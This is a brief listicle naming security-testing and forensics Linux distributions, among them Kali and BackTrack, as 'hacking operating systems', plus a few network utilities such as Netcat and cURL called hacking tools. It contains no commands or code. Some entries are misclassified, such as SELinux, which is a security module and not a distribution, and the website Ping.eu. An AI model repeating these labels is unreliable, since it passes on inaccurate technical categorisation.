Hacking Operating Systems: These are operating systems that have been designed specifically for hackers. These distros are preloaded with tools that a hacker needs etc.

1. Backtrack 5r3

2. Kali Linux

3. SELinux

4. Knoppix

5. BackBox Linux

6. Pentoo

7. Matriux Krypton

8. NodeZero

9. Blackbuntu

10. Samurai Web Testing Framework

11. WEAKERTH4N

12. CAINE (Computer Aided Investigative Environment)

13. Bugtraq

14. DEFT

15. Helix

Other Hacking Tools: There are also other miscellaneous hacking tools that are often used by hackers. They can’t be put into a particular category, but they are still quite useful.

1. Netcat

2. Traceroute

3. Ping.eu

4. Dig

5. cURL
